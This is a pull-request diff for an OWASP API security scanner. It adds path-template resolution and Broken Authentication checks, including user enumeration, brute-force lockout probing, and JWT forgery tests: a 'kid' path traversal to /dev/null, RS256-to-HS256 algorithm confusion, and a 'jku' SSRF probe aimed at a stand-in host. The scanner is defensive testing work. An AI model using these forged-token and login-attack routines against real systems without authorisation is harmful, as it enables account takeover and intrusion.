### PR TITLE
fix: close 8 structural coverage gaps + robustness pass (#95-102 + 3 more)

### DIFF
--- a/src/main/java/org/owasp/astf/core/EndpointInfo.java
+++ b/src/main/java/org/owasp/astf/core/EndpointInfo.java
@@ -1,5 +1,8 @@
 package org.owasp.astf.core;
 
+import java.net.URI;
+import java.net.URISyntaxException;
+
 /**
  * Represents information about an API endpoint to be tested.
  */
@@ -10,6 +13,13 @@ public class EndpointInfo {
     private String requestBody;
     private final boolean requiresAuthentication;
     private String baseUrl;
+
+    // True once an unresolved OpenAPI path-template placeholder (e.g. "/{username}") has been
+    // replaced with a real, discovered value (see org.owasp.astf.core.discovery.PathTemplateResolver).
+    // Test cases that don't do ID substitution themselves (like BrokenObjectLevelAuthorizationTestCase's
+    // cross-user check) use this to know a non-numeric/non-UUID last path segment is still a
+    // legitimate, real object identifier rather than a literal, untestable template string.
+    private boolean resolvedFromTemplate = false;
 
     public EndpointInfo(String path, String method) {
         this.path = path;
@@ -54,17 +64,50 @@ public class EndpointInfo {
         this.baseUrl = baseUrl;
     }
 
+    public boolean isResolvedFromTemplate() {
+        return resolvedFromTemplate;
+    }
+
+    public void setResolvedFromTemplate(boolean resolvedFromTemplate) {
+        this.resolvedFromTemplate = resolvedFromTemplate;
+    }
+
     /**
      * Returns the full URL by combining baseUrl and path.
      * Falls back to path alone if baseUrl is not set.
+     * <p>
+     * The path is percent-encoded before being appended. This matters for any endpoint whose
+     * path still contains an unresolved OpenAPI template placeholder (e.g. {@code /{username}})
+     * when a test case doesn't resolve or substitute it first: a literal, unencoded {@code {}} in
+     * an HTTP request line is invalid per RFC 3986, and different servers handle that
+     * inconsistently — some 400 quickly, but at least one real target (VAmPI's dev server, found
+     * via live testing) simply hangs the connection with no response at all. Encoding makes the
+     * request syntactically valid regardless, so it fails fast (typically a 404) instead of
+     * hanging — turning an untestable endpoint into a merely-unproductive one rather than a
+     * pipeline stall that silently wastes the timeout budget of every test case that reaches it.
      */
     public String getFullUrl() {
+        String encodedPath = encodePath(path);
         if (baseUrl != null && !baseUrl.isEmpty()) {
             String base = baseUrl.endsWith("/") ? baseUrl.substring(0, baseUrl.length() - 1) : baseUrl;
-            String p = path.startsWith("/") ? path : "/" + path;
+            String p = encodedPath.startsWith("/") ? encodedPath : "/" + encodedPath;
             return base + p;
         }
-        return path;
+        return encodedPath;
+    }
+
+    /**
+     * Percent-encodes characters in {@code rawPath} that aren't valid in a raw URI path
+     * (e.g. {@code {}}, spaces), while leaving already-valid path structure — including
+     * legitimately pre-encoded sequences like {@code %20} — untouched.
+     */
+    private static String encodePath(String rawPath) {
+        try {
+            URI uri = new URI("http", "placeholder.invalid", rawPath, null);
+            return uri.getRawPath();
+        } catch (URISyntaxException e) {
+            return rawPath; // fall back to the original string if it's unencodable for some other reason
+        }
     }
 
     @Override

--- a/src/main/java/org/owasp/astf/core/Scanner.java
+++ b/src/main/java/org/owasp/astf/core/Scanner.java
@@ -16,6 +16,7 @@ import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.owasp.astf.core.config.ScanConfig;
 import org.owasp.astf.core.discovery.EndpointDiscoveryService;
+import org.owasp.astf.core.discovery.PathTemplateResolver;
 import org.owasp.astf.core.http.HttpClient;
 import org.owasp.astf.core.result.Finding;
 import org.owasp.astf.core.result.ScanResult;
@@ -100,6 +101,28 @@ public class Scanner {
                     ep.setBaseUrl(targetUrl);
                 }
             }
+
+            // Resolve unresolved OpenAPI path-template placeholders (e.g. /users/v1/{username})
+            // to real, discovered values ONCE here, centrally, before any test case runs — rather
+            // than leaving each test case to either duplicate this resolution logic itself (only
+            // BrokenObjectLevelAuthorizationTestCase originally did) or send the literal,
+            // unresolved placeholder on every request. That literal-placeholder request isn't
+            // just untested — a raw, unencoded "{" / "}" in an HTTP request line is invalid per
+            // RFC 3986, and live testing against VAmPI found its dev server doesn't error on that,
+            // it hangs the connection with no response at all, burning the full timeout on every
+            // test case that hits it. EndpointInfo.getFullUrl() now percent-encodes as a safety
+            // net regardless, but resolving to a real value here means every test case gets to
+            // exercise the actual target resource instead of a dead template string.
+            //
+            // No endpoint is ever dropped by this step, resolved or not — an endpoint that can't
+            // be resolved is simply left as-is and still tested exactly as before, since the
+            // scan's purpose is to find as many real issues as possible, not to narrow what gets
+            // tested.
+            List<EndpointInfo> resolvedEndpoints = new ArrayList<>(endpoints.size());
+            for (EndpointInfo ep : endpoints) {
+                resolvedEndpoints.add(PathTemplateResolver.resolve(ep, httpClient));
+            }
+            endpoints = resolvedEndpoints;
 
             // Get applicable test cases
             List<TestCase> testCases = testCaseRegistry.getEnabledTestCases(config);

--- a/src/main/java/org/owasp/astf/core/discovery/PathTemplateResolver.java
+++ b/src/main/java/org/owasp/astf/core/discovery/PathTemplateResolver.java
@@ -1,0 +1,179 @@
+package org.owasp.astf.core.discovery;
+
+import java.util.Iterator;
+import java.util.List;
+import java.util.Map;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+/**
+ * Resolves an unresolved OpenAPI path-template placeholder (e.g. {@code /books/v1/{book_title}})
+ * to a real, discovered value, so every test case gets to exercise the actual target resource
+ * instead of a literal, non-existent placeholder string.
+ * <p>
+ * Originally implemented only inside {@code BrokenObjectLevelAuthorizationTestCase} (for its own
+ * BOLA testing), then centralized here after live testing against VAmPI showed every <em>other</em>
+ * test case — which has no resolution logic of its own — was sending the raw, unresolved
+ * placeholder path on every request. That's not just a missed opportunity to test the real
+ * endpoint: a literal, unencoded {@code {}} in an HTTP request line is invalid per RFC 3986, and
+ * VAmPI's dev server simply hung the connection on such a request rather than responding at all
+ * — meaning every non-BOLA test case was silently wasting its full connection timeout on every
+ * templated endpoint, without producing a single meaningful finding for or against it.
+ * <p>
+ * {@link org.owasp.astf.core.Scanner} calls this once per discovered endpoint before test cases
+ * run, so the fix benefits all of them without each needing its own copy of this logic.
+ * Individual test cases (like BOLA) may still call this directly too — it's idempotent, so
+ * calling it on an already-resolved endpoint is a fast no-op.
+ */
+public final class PathTemplateResolver {
+    private static final Logger logger = LogManager.getLogger(PathTemplateResolver.class);
+
+    private static final Pattern NUMERIC_ID_PATTERN = Pattern.compile("/(\\d+)(/|$)");
+    private static final Pattern UUID_PATTERN = Pattern.compile(
+            "/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(/|$)",
+            Pattern.CASE_INSENSITIVE);
+
+    // Matches an unresolved OpenAPI path template placeholder, e.g. "/{book_title}" or
+    // "/{username}" — a literal curly-brace segment straight from the spec, not a real value.
+    private static final Pattern TEMPLATE_PLACEHOLDER_PATTERN = Pattern.compile("/\\{([^/{}]+)\\}");
+
+    // Field names, in priority order, checked when looking for a plausible real identifier
+    // value in a discovered collection endpoint's response body.
+    private static final List<String> ID_LIKE_FIELD_NAMES = List.of(
+            "id", "uuid", "username", "title", "slug", "name", "key", "code"
+    );
+
+    private static final ObjectMapper OBJECT_MAPPER = new ObjectMapper();
+
+    private PathTemplateResolver() {
+    }
+
+    /**
+     * If the endpoint's path contains an unresolved OpenAPI template placeholder (e.g.
+     * {@code /books/v1/{book_title}}), attempts to substitute it with a real, discovered value:
+     * queries the endpoint's likely collection URL (the same path with the placeholder segment
+     * and everything after it removed — e.g. {@code /books/v1}) and searches the response for a
+     * plausible identifier field ({@link #ID_LIKE_FIELD_NAMES}).
+     * <p>
+     * Returns the original endpoint <strong>unchanged</strong> — never dropped, never removed
+     * from consideration — whenever there's nothing to resolve (no placeholder, an already
+     * concrete numeric/UUID id, or already marked {@link EndpointInfo#isResolvedFromTemplate()})
+     * or resolution fails for any reason (no collection endpoint, empty response, no recognizable
+     * id field). An unresolved endpoint is still tested by every test case exactly as it would
+     * have been without this method existing — this only ever adds a better, real target on top,
+     * never subtracts a candidate the scan would otherwise have covered.
+     */
+    public static EndpointInfo resolve(EndpointInfo endpoint, HttpClient httpClient) {
+        if (endpoint.isResolvedFromTemplate()) {
+            return endpoint; // already resolved (e.g. by Scanner) — idempotent no-op
+        }
+
+        String path = endpoint.getPath();
+        if (NUMERIC_ID_PATTERN.matcher(path).find() || UUID_PATTERN.matcher(path).find()) {
+            return endpoint; // already a concrete, testable id
+        }
+
+        Matcher placeholderMatcher = TEMPLATE_PLACEHOLDER_PATTERN.matcher(path);
+        if (!placeholderMatcher.find()) {
+            return endpoint; // no placeholder at all — nothing to resolve
+        }
+
+        String placeholder = placeholderMatcher.group();
+        int placeholderIndex = path.indexOf(placeholder);
+        String collectionPath = path.substring(0, placeholderIndex);
+        if (collectionPath.isEmpty()) {
+            return endpoint;
+        }
+
+        try {
+            String collectionUrl = buildUrl(endpoint, collectionPath);
+            HttpResponse response = httpClient.getWithStatus(collectionUrl, Map.of());
+            if (response == null || !response.isSuccess() || response.getBody() == null || response.getBody().isBlank()) {
+                return endpoint;
+            }
+
+            // The placeholder's own name (e.g. "book_title") is often the exact field name the
+            // API itself uses in its responses — try that before falling back to generic
+            // id-like names, since a fixed generic list can never cover every naming convention.
+            String preferredFieldName = placeholderMatcher.group(1);
+
+            JsonNode root = OBJECT_MAPPER.readTree(response.getBody());
+            String idValue = findFirstIdLikeValue(root, 0, preferredFieldName);
+            if (idValue == null) {
+                return endpoint;
+            }
+
+            String resolvedPath = collectionPath + "/" + idValue + path.substring(placeholderIndex + placeholder.length());
+            EndpointInfo resolved = new EndpointInfo(resolvedPath, endpoint.getMethod(), endpoint.getContentType(),
+                    endpoint.getRequestBody(), endpoint.isRequiresAuthentication());
+            resolved.setBaseUrl(endpoint.getBaseUrl());
+            resolved.setResolvedFromTemplate(true);
+            logger.info("Resolved path template {} -> {} using a value discovered from {}",
+                    path, resolvedPath, collectionPath);
+            return resolved;
+        } catch (Exception e) {
+            logger.debug("Could not resolve path template {} to a real value: {}", path, e.getMessage());
+            return endpoint;
+        }
+    }
+
+    /**
+     * Recursively searches a JSON response (bounded to 3 levels deep) for a plausible identifier
+     * value, checking arrays element-by-element and objects both for a direct field match and
+     * for nested objects/arrays (handling common wrapper shapes like {@code {"data": [...]}} as
+     * well as bare arrays or single objects).
+     * <p>
+     * Tries {@code preferredFieldName} (the path placeholder's own name, e.g. {@code
+     * "book_title"}) first — APIs very often use the exact same field name in both the path
+     * template and the response body — before falling back to {@link #ID_LIKE_FIELD_NAMES},
+     * since no fixed generic list can cover every real-world naming convention.
+     */
+    private static String findFirstIdLikeValue(JsonNode node, int depth, String preferredFieldName) {
+        if (node == null || depth > 3) {
+            return null;
+        }
+        if (node.isArray()) {
+            for (JsonNode item : node) {
+                String found = findFirstIdLikeValue(item, depth + 1, preferredFieldName);
+                if (found != null) return found;
+            }
+            return null;
+        }
+        if (node.isObject()) {
+            if (preferredFieldName != null) {
+                JsonNode preferred = node.get(preferredFieldName);
+                if (preferred != null && preferred.isValueNode() && !preferred.asText().isBlank()) {
+                    return preferred.asText();
+                }
+            }
+            for (String fieldName : ID_LIKE_FIELD_NAMES) {
+                JsonNode value = node.get(fieldName);
+                if (value != null && value.isValueNode() && !value.asText().isBlank()) {
+                    return value.asText();
+                }
+            }
+            Iterator<JsonNode> children = node.elements();
+            while (children.hasNext()) {
+                String found = findFirstIdLikeValue(children.next(), depth + 1, preferredFieldName);
+                if (found != null) return found;
+            }
+        }
+        return null;
+    }
+
+    private static String buildUrl(EndpointInfo endpoint, String path) {
+        String base = endpoint.getBaseUrl();
+        if (base == null || base.isEmpty()) return path;
+        base = base.endsWith("/") ? base.substring(0, base.length() - 1) : base;
+        return base + (path.startsWith("/") ? path : "/" + path);
+    }
+}

--- a/src/main/java/org/owasp/astf/testcases/BrokenAuthenticationTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/BrokenAuthenticationTestCase.java
@@ -1,10 +1,18 @@
 package org.owasp.astf.testcases;
 
 import java.io.IOException;
+import java.math.BigInteger;
+import java.nio.charset.StandardCharsets;
+import java.security.KeyFactory;
+import java.security.PublicKey;
+import java.security.spec.RSAPublicKeySpec;
 import java.util.ArrayList;
+import java.util.Base64;
 import java.util.List;
 import java.util.Map;
 import java.util.UUID;
+import javax.crypto.Mac;
+import javax.crypto.spec.SecretKeySpec;
 
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
@@ -13,6 +21,9 @@ import org.owasp.astf.core.http.HttpClient;
 import org.owasp.astf.core.http.HttpResponse;
 import org.owasp.astf.core.result.Finding;
 import org.owasp.astf.core.result.Severity;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
 
 /**
  * Tests for API2:2023 Broken Authentication.
@@ -24,6 +35,7 @@ import org.owasp.astf.core.result.Severity;
  */
 public class BrokenAuthenticationTestCase implements TestCase {
     private static final Logger logger = LogManager.getLogger(BrokenAuthenticationTestCase.class);
+    private final ObjectMapper objectMapper = new ObjectMapper();
 
     private static final List<String> AUTH_PATH_PATTERNS = List.of(
             "login", "auth", "token", "signin", "oauth", "session"
@@ -54,6 +66,20 @@ public class BrokenAuthenticationTestCase implements TestCase {
     // the response body (e.g. VAmPI: {"status":"fail","message":"..."} with a 200 status).
     // A 2xx status code alone is therefore not sufficient evidence of a successful auth bypass —
     // it must also be checked against these common failure markers in the body.
+    // Common account names tried for the enumeration check — a heuristic, not exhaustive: this
+    // reliably detects the vulnerability class on any target using one of these very common
+    // account names, but (like any wordlist-based technique) can't prove its absence.
+    private static final List<String> COMMON_USERNAMES = List.of("admin", "test", "user", "root", "guest");
+
+    // Phrases distinguishing an "unknown account" response from a "wrong password for a real
+    // account" response — the differential signal user-enumeration checks look for.
+    private static final List<String> NO_SUCH_USER_MARKERS = List.of(
+            "no such user", "user not found", "username not found", "account not found",
+            "user does not exist", "unknown user", "no account", "user doesn't exist"
+    );
+
+    private static final int BRUTE_FORCE_ATTEMPTS = 8;
+
     private static final List<String> AUTH_FAILURE_BODY_MARKERS = List.of(
             "\"status\":\"fail\"", "\"status\": \"fail\"",
             "\"success\":false", "\"success\": false",
@@ -100,6 +126,8 @@ public class BrokenAuthenticationTestCase implements TestCase {
 
         if (isAuth) {
             findings.addAll(testWeakAuthentication(endpoint, httpClient));
+            findings.addAll(testUserEnumeration(endpoint, httpClient));
+            findings.addAll(testBruteForceLockout(endpoint, httpClient));
             findings.addAll(testTwoFactorBypass(endpoint, httpClient));
         } else if (is2FA) {
             findings.addAll(testTwoFactorBypass(endpoint, httpClient));
@@ -197,6 +225,134 @@ public class BrokenAuthenticationTestCase implements TestCase {
                     "Implement strong password policies, account lockout after failed attempts, " +
                     "rate limiting, and proper token generation using industry-standard algorithms."
             ));
+        }
+
+        return findings;
+    }
+
+    /**
+     * Tests for username enumeration: compares the login response for a definitely-nonexistent,
+     * randomly-generated username against a set of very common account names ({@link
+     * #COMMON_USERNAMES}), both with the same wrong password. A meaningfully different response
+     * (different status code, or a body that mentions "no such user" for one but not the other)
+     * indicates the API distinguishes "unknown account" from "wrong password for a real account,"
+     * letting an attacker enumerate valid usernames before brute-forcing them.
+     * <p>
+     * This is a heuristic, not an exhaustive check: it can only detect the vulnerability if one
+     * of the common names happens to be a real account. A negative result doesn't prove the
+     * target is safe, only that none of these particular names revealed a difference — the same
+     * limitation any wordlist-based technique has.
+     */
+    List<Finding> testUserEnumeration(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        if (!endpoint.getMethod().equalsIgnoreCase("POST")) {
+            return findings;
+        }
+
+        String fullUrl = endpoint.getFullUrl();
+        String randomUsername = "nonexistent_" + UUID.randomUUID().toString().substring(0, 8);
+
+        try {
+            HttpResponse randomResponse = httpClient.postWithStatus(fullUrl, Map.of(), "application/json",
+                    String.format("{\"username\":\"%s\",\"password\":\"WrongPass!23\"}", randomUsername));
+            if (randomResponse == null) {
+                return findings;
+            }
+
+            for (String commonUsername : COMMON_USERNAMES) {
+                HttpResponse commonResponse = httpClient.postWithStatus(fullUrl, Map.of(), "application/json",
+                        String.format("{\"username\":\"%s\",\"password\":\"WrongPass!23\"}", commonUsername));
+                if (commonResponse == null) {
+                    continue;
+                }
+
+                if (responsesRevealEnumeration(randomResponse, commonResponse)) {
+                    Finding finding = new Finding(
+                            UUID.randomUUID().toString(),
+                            "User Enumeration via Differential Login Response",
+                            String.format("The login endpoint responds differently to a definitely-nonexistent " +
+                                    "username ('%s') than to the common account name '%s', both with an " +
+                                    "incorrect password. This lets an attacker enumerate valid usernames " +
+                                    "before attempting to brute-force their passwords.",
+                                    randomUsername, commonUsername),
+                            Severity.MEDIUM,
+                            getId(),
+                            endpoint.getMethod() + " " + endpoint.getPath(),
+                            "Return an identical, generic response (same status code and message, e.g. " +
+                            "\"Invalid username or password\") regardless of whether the account exists."
+                    );
+                    finding.setEvidence(String.format(
+                            "Random username '%s' -> HTTP %d%nCommon username '%s' -> HTTP %d",
+                            randomUsername, randomResponse.getStatusCode(),
+                            commonUsername, commonResponse.getStatusCode()));
+                    findings.add(finding);
+                    return findings; // one confirmed instance is enough
+                }
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing user enumeration on {}: {}", endpoint, e.getMessage());
+        }
+
+        return findings;
+    }
+
+    private boolean responsesRevealEnumeration(HttpResponse a, HttpResponse b) {
+        if (a.getStatusCode() != b.getStatusCode()) {
+            return true;
+        }
+        String bodyA = a.getBody() != null ? a.getBody().toLowerCase() : "";
+        String bodyB = b.getBody() != null ? b.getBody().toLowerCase() : "";
+        boolean aSaysNoSuchUser = NO_SUCH_USER_MARKERS.stream().anyMatch(bodyA::contains);
+        boolean bSaysNoSuchUser = NO_SUCH_USER_MARKERS.stream().anyMatch(bodyB::contains);
+        return aSaysNoSuchUser != bSaysNoSuchUser;
+    }
+
+    /**
+     * Tests for missing account lockout / rate limiting: sends {@link #BRUTE_FORCE_ATTEMPTS}
+     * consecutive failed login attempts against the same (common) account and confirms the API
+     * never responds with a rate-limit or lockout signal (HTTP 429, or 423 Locked). No lockout
+     * after repeated failures means credential-stuffing and brute-force attacks face no
+     * automated resistance.
+     */
+    List<Finding> testBruteForceLockout(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        if (!endpoint.getMethod().equalsIgnoreCase("POST")) {
+            return findings;
+        }
+
+        String fullUrl = endpoint.getFullUrl();
+        HttpResponse lastResponse = null;
+
+        try {
+            for (int attempt = 0; attempt < BRUTE_FORCE_ATTEMPTS; attempt++) {
+                lastResponse = httpClient.postWithStatus(fullUrl, Map.of(), "application/json",
+                        String.format("{\"username\":\"admin\",\"password\":\"WrongPass-%d!\"}", attempt));
+                if (lastResponse == null) {
+                    return findings;
+                }
+                if (lastResponse.isRateLimited() || lastResponse.getStatusCode() == 423) {
+                    return findings; // lockout/rate-limiting is working correctly
+                }
+            }
+
+            Finding finding = new Finding(
+                    UUID.randomUUID().toString(),
+                    "No Account Lockout or Rate Limiting on Repeated Failed Logins",
+                    String.format("%d consecutive failed login attempts against the same account produced " +
+                            "no rate-limiting or lockout response (HTTP 429/423). This allows unrestricted " +
+                            "brute-force and credential-stuffing attacks against user accounts.",
+                            BRUTE_FORCE_ATTEMPTS),
+                    Severity.MEDIUM,
+                    getId(),
+                    endpoint.getMethod() + " " + endpoint.getPath(),
+                    "Implement account lockout or exponential rate limiting after a small number of failed " +
+                    "attempts (e.g. 5), and consider CAPTCHA or IP-based throttling for repeated failures."
+            );
+            finding.setEvidence("Last of " + BRUTE_FORCE_ATTEMPTS + " attempts returned HTTP " +
+                    lastResponse.getStatusCode() + " with no lockout signal");
+            findings.add(finding);
+        } catch (Exception e) {
+            logger.debug("Error testing brute-force lockout on {}: {}", endpoint, e.getMessage());
         }
 
         return findings;
@@ -364,6 +520,9 @@ public class BrokenAuthenticationTestCase implements TestCase {
         }
 
         findings.addAll(testExpiredJwt(endpoint, httpClient));
+        findings.addAll(testJwtKidPathTraversal(endpoint, httpClient));
+        findings.addAll(testJwtAlgorithmConfusion(endpoint, httpClient));
+        findings.addAll(testJwtJkuProcessing(endpoint, httpClient));
         return findings;
     }
 
@@ -426,6 +585,289 @@ public class BrokenAuthenticationTestCase implements TestCase {
         }
 
         return findings;
+    }
+
+    /**
+     * Tests the classic "kid: /dev/null" JWT attack: some servers use the {@code kid} (Key ID)
+     * header to look up a key file on disk (e.g. {@code keys/<kid>.pem}) without sanitizing it.
+     * A path-traversal {@code kid} pointing at {@code /dev/null} makes the server "find" an empty
+     * key file — reading zero bytes as the HMAC secret — so a token signed with an empty-string
+     * HS256 secret is accepted as validly signed.
+     */
+    List<Finding> testJwtKidPathTraversal(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            String fullUrl = endpoint.getFullUrl();
+
+            HttpResponse baseline = probeWithoutAuth(endpoint, httpClient, fullUrl);
+            if (baseline == null || baseline.isSuccess()) {
+                return findings; // publicly accessible — a forged-token "bypass" would be meaningless
+            }
+
+            String header = "{\"alg\":\"HS256\",\"typ\":\"JWT\",\"kid\":\"../../../../../../../../../../dev/null\"}";
+            String payload = "{\"sub\":\"admin\",\"role\":\"admin\",\"iat\":" + (System.currentTimeMillis() / 1000) + "}";
+            String forgedJwt = signHs256(header, payload, new byte[0]);
+
+            Map<String, String> headers = Map.of("Authorization", "Bearer " + forgedJwt);
+            HttpResponse response = switch (endpoint.getMethod().toUpperCase()) {
+                case "POST"   -> httpClient.postWithStatus(fullUrl, headers, "application/json", "{}");
+                case "PUT"    -> httpClient.putWithStatus(fullUrl, headers, "application/json", "{}");
+                case "DELETE" -> httpClient.deleteWithStatus(fullUrl, headers);
+                default       -> httpClient.getWithStatus(fullUrl, headers);
+            };
+
+            if (looksLikeAuthSuccess(response)) {
+                Finding finding = new Finding(
+                        UUID.randomUUID().toString(),
+                        "JWT 'kid' Path Traversal Accepted",
+                        "The API accepted a JWT whose 'kid' (Key ID) header was a path-traversal string " +
+                        "pointing at /dev/null, signed with HS256 using an empty secret (simulating the " +
+                        "server reading an empty file as the verification key). This means the 'kid' " +
+                        "header's value is used to locate a key file on disk without validation.",
+                        Severity.CRITICAL,
+                        getId(),
+                        endpoint.getMethod() + " " + endpoint.getPath(),
+                        "Never derive a filesystem path or key lookup directly from a client-supplied JWT " +
+                        "header. Use a fixed allowlist of known key IDs, and reject any 'kid' value that " +
+                        "isn't an exact match."
+                );
+                finding.setEvidence("Server returned HTTP " + response.getStatusCode() +
+                        " for a token with kid='../../../../../../../../../../dev/null' signed with an empty HMAC secret " +
+                        "(baseline without auth: HTTP " + baseline.getStatusCode() + ")");
+                findings.add(finding);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing JWT kid path traversal on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    /**
+     * Tests RS256-to-HS256 algorithm confusion: if the server exposes its RSA public key (via a
+     * JWKS endpoint) and doesn't strictly enforce the expected signing algorithm, an attacker can
+     * sign a token with HS256 using the server's own PUBLIC key bytes as the HMAC secret. Because
+     * the server already has that exact public key on hand to "verify" the signature, and HMAC
+     * verification is just "does re-computing the HMAC with our key match" — it does — the forged
+     * token passes. Requires the target to actually expose a JWKS; skipped entirely otherwise
+     * since there's no key material to build a forged token from.
+     */
+    List<Finding> testJwtAlgorithmConfusion(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            byte[] publicKeyBytes = fetchRsaPublicKeyBytes(endpoint, httpClient);
+            if (publicKeyBytes == null) {
+                return findings; // no exposed JWKS — nothing to build a forged token from
+            }
+
+            String fullUrl = endpoint.getFullUrl();
+            HttpResponse baseline = probeWithoutAuth(endpoint, httpClient, fullUrl);
+            if (baseline == null || baseline.isSuccess()) {
+                return findings;
+            }
+
+            String header = "{\"alg\":\"HS256\",\"typ\":\"JWT\"}";
+            String payload = "{\"sub\":\"admin\",\"role\":\"admin\",\"iat\":" + (System.currentTimeMillis() / 1000) + "}";
+            String forgedJwt = signHs256(header, payload, publicKeyBytes);
+
+            Map<String, String> headers = Map.of("Authorization", "Bearer " + forgedJwt);
+            HttpResponse response = switch (endpoint.getMethod().toUpperCase()) {
+                case "POST"   -> httpClient.postWithStatus(fullUrl, headers, "application/json", "{}");
+                case "PUT"    -> httpClient.putWithStatus(fullUrl, headers, "application/json", "{}");
+                case "DELETE" -> httpClient.deleteWithStatus(fullUrl, headers);
+                default       -> httpClient.getWithStatus(fullUrl, headers);
+            };
+
+            if (looksLikeAuthSuccess(response)) {
+                Finding finding = new Finding(
+                        UUID.randomUUID().toString(),
+                        "JWT Algorithm Confusion (RS256 to HS256) Accepted",
+                        "The API accepted a JWT signed with HS256 using its own published RSA public key " +
+                        "(from the exposed JWKS) as the HMAC secret. This is the classic RS256-to-HS256 " +
+                        "algorithm-confusion attack: since the server already has that exact public key, " +
+                        "it can 'verify' an HMAC signature computed with it, letting anyone forge tokens " +
+                        "without ever knowing the server's private key.",
+                        Severity.CRITICAL,
+                        getId(),
+                        endpoint.getMethod() + " " + endpoint.getPath(),
+                        "Enforce a strict allowlist of accepted signing algorithms per key/endpoint — never " +
+                        "trust the 'alg' header from the token itself. Use a JWT library configured to " +
+                        "reject algorithm mismatches (e.g. expecting RS256 but receiving HS256)."
+                );
+                finding.setEvidence("Server returned HTTP " + response.getStatusCode() +
+                        " for an HS256 token signed with the server's own RSA public key bytes as the secret " +
+                        "(baseline without auth: HTTP " + baseline.getStatusCode() + ")");
+                findings.add(finding);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing JWT algorithm confusion on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    /**
+     * Detects (does not exploit) processing of the JWT {@code jku} (JWK Set URL) header — a
+     * header telling the verifier where to fetch the signing key from. If the server fetches
+     * whatever URL an attacker supplies without an allowlist, that's both an SSRF vector and a
+     * signature-forgery vector (point {@code jku} at attacker-hosted keys, sign with the matching
+     * private key). Fully exploiting it requires hosting attacker-controlled key material at a
+     * reachable URL, which this framework has no ability to do from a black-box scan — so this
+     * only detects whether the header is processed at all (via a response-latency signal, the
+     * same approach {@link RegexDosTestCase} uses), and flags it as INFO for manual follow-up
+     * rather than claiming forgery.
+     */
+    List<Finding> testJwtJkuProcessing(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            String fullUrl = endpoint.getFullUrl();
+
+            long baselineStart = System.currentTimeMillis();
+            HttpResponse baseline = probeWithoutAuth(endpoint, httpClient, fullUrl);
+            long baselineElapsed = System.currentTimeMillis() - baselineStart;
+            if (baseline == null || baseline.isSuccess()) {
+                return findings;
+            }
+
+            String header = "{\"alg\":\"HS256\",\"typ\":\"JWT\"," +
+                    "\"jku\":\"http://169.254.169.254.astf-jku-probe.invalid/jwks.json\"}";
+            String payload = "{\"sub\":\"admin\",\"iat\":" + (System.currentTimeMillis() / 1000) + "}";
+            String probeJwt = signHs256(header, payload, new byte[]{0});
+
+            long start = System.currentTimeMillis();
+            boolean timedOut = false;
+            HttpResponse response = null;
+            try {
+                Map<String, String> headers = Map.of("Authorization", "Bearer " + probeJwt);
+                response = switch (endpoint.getMethod().toUpperCase()) {
+                    case "POST"   -> httpClient.postWithStatus(fullUrl, headers, "application/json", "{}");
+                    case "PUT"    -> httpClient.putWithStatus(fullUrl, headers, "application/json", "{}");
+                    case "DELETE" -> httpClient.deleteWithStatus(fullUrl, headers);
+                    default       -> httpClient.getWithStatus(fullUrl, headers);
+                };
+            } catch (IOException e) {
+                timedOut = true;
+            }
+            long elapsed = System.currentTimeMillis() - start;
+
+            boolean tookMuchLonger = elapsed > Math.max(3000, baselineElapsed * 8);
+            String responseBody = response != null ? response.getBody() : null;
+            boolean errorMentionsUrl = responseBody != null &&
+                    responseBody.toLowerCase().contains("astf-jku-probe.invalid");
+
+            if (timedOut || tookMuchLonger || errorMentionsUrl) {
+                Finding finding = new Finding(
+                        UUID.randomUUID().toString(),
+                        "JWT 'jku' Header Processed — Manual SSRF/Forgery Review Recommended",
+                        "The server appears to process the JWT 'jku' (JWK Set URL) header — an attempt to " +
+                        "fetch a key set from an attacker-controlled URL caused a " +
+                        (timedOut ? "connection timeout" : errorMentionsUrl ? "response mentioning the probe URL"
+                                : "significant response delay") +
+                        ". If 'jku' isn't restricted to an allowlist of trusted hosts, this is both an SSRF " +
+                        "vector and a signature-forgery vector (an attacker can host their own signing key " +
+                        "at a URL they control). This framework can't fully exploit this without hosting " +
+                        "attacker-controlled key material — manual verification is recommended.",
+                        Severity.INFO,
+                        getId(),
+                        endpoint.getMethod() + " " + endpoint.getPath(),
+                        "Never fetch keys from a client-supplied URL. Use a fixed, server-side key store, " +
+                        "or if 'jku' must be supported, strictly validate it against an allowlist of trusted " +
+                        "hosts before fetching."
+                );
+                finding.setEvidence(timedOut
+                        ? "Request with jku header timed out (baseline: " + baselineElapsed + "ms)"
+                        : "Response took " + elapsed + "ms with jku header set (baseline: " + baselineElapsed + "ms)");
+                findings.add(finding);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing JWT jku processing on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    /** Sends a request with no auth header, used as the "endpoint actually requires auth" baseline. */
+    private HttpResponse probeWithoutAuth(EndpointInfo endpoint, HttpClient httpClient, String fullUrl) throws IOException {
+        return switch (endpoint.getMethod().toUpperCase()) {
+            case "POST"   -> httpClient.postWithStatus(fullUrl, Map.of(), "application/json", "{}");
